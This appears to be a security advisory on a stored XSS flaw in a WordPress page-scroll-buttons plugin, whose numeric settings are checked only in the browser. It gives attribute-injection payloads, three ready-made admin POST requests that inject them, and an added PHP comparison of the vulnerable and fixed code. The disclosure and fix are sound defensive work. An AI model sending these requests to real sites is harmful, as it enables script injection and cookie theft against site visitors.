The plugin did not sanitise or validate its settings server side (for example psb_distance, psb_buttonsize and psb_speed); they were only validated client side, which is bypassed by sending the form request directly. This could allow high-privilege users (such as admins) to store XSS payloads in these settings, which are then rendered unescaped in the page (persistent XSS).
### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "
[$] " autofocus=autofocus onfocus=alert(document.domain); "

### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13

### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13

### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22
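The following is an added illustration of the bug class behind these PoCs, not the plugin's own code. It shows the vulnerable pattern (client-side-only validation, raw POST value stored and echoed into an HTML attribute) next to the hardened pattern (coerce to a non-negative integer on save with WordPress's absint(), escape on output with esc_attr()). The option names come from the advisory above; the function names, the output markup and the placement of the value in a hidden input are assumptions. absint() and esc_attr() are WordPress core helpers; minimal stand-ins are defined so the file also runs under plain `php` outside WordPress.

```php
<?php
// Added example, not the plugin's code. Option names are from the advisory;
// the save/render function names and the markup are hypothetical.

// Stand-ins for the WordPress helpers so this runs outside WP as well.
if (!function_exists('absint')) {
    function absint($v) { return abs((int) $v); }
}
if (!function_exists('esc_attr')) {
    function esc_attr($v) {
        return htmlspecialchars((string) $v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

$fields = ['psb_distance', 'psb_buttonsize', 'psb_speed'];

// Vulnerable pattern: the JavaScript check in the settings form is the only
// check, so the handler stores whatever arrives in the POST body ...
function save_options_vulnerable(array $post, array $fields): array {
    $opts = [];
    foreach ($fields as $f) {
        $opts[$f] = isset($post[$f]) ? (string) $post[$f] : '';
    }
    return $opts;
}
// ... and later echoes it, unescaped, inside a double-quoted attribute.
function render_vulnerable(array $opts): string {
    return '<input type="hidden" id="psb_speed" value="' . $opts['psb_speed'] . '">';
}

// Hardened pattern: these settings are pixel / millisecond numbers, so the
// server coerces them to non-negative integers on save and still escapes on
// output, because a value stored before the fix may already be hostile.
function save_options_hardened(array $post, array $fields): array {
    $opts = [];
    foreach ($fields as $f) {
        $opts[$f] = isset($post[$f]) ? absint($post[$f]) : 0;
    }
    return $opts;
}
function render_hardened(array $opts): string {
    return '<input type="hidden" id="psb_speed" value="' . esc_attr($opts['psb_speed']) . '">';
}

// Constructed POST body: the URL-decoded form of PoC #3 from the advisory.
$post = [
    'psb_distance'   => '13',
    'psb_buttonsize' => '13',
    'psb_speed'      => '" autofocus=autofocus onfocus=alert(document.domain); "',
];

echo render_vulnerable(save_options_vulnerable($post, $fields)), PHP_EOL;
echo render_hardened(save_options_hardened($post, $fields)), PHP_EOL;
```

In the vulnerable output the leading `"` of the payload closes the `value` attribute, so `autofocus` and `onfocus` become real attributes of the input and the handler fires as soon as the settings page loads; in the hardened output the non-numeric string collapses to `0` under absint() and nothing attacker-controlled reaches the page. Two caveats a reviewer would want: a nonce does not help here, since the attacker is the legitimate admin submitting the form; and on a single-site WordPress install administrators normally hold the unfiltered_html capability anyway, so the practical impact is highest on multisite or on installs that deliberately remove that capability.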
m0ze
m0ze
Yes
2021-05-17
2021-05-17
2021-05-18